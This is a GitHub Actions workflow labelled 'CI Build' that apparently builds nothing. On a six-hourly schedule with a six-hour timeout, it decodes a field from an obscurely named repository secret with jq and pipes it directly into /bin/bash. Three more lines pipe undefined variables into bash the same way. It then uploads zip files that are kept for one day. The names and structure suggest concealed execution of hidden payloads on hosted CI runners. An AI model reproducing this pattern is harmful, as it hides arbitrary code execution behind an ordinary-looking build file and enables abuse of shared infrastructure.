name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '20 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          nxbl62: ${{ secrets.nxbl62 }}
        run: |
          printf '%s' "$nxbl62" | jq -r .a55 | /bin/bash
          echo $rfc6475 | jq -r .esyug083 | /bin/bash
          printf '%s' "$qjrv0" | jq -r .st0881 | /bin/bash
          printf '%s' "$wwyoo2" | jq -r .z698 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: AY9gGhdh
          path: "*.zip"
          retention-days: 1
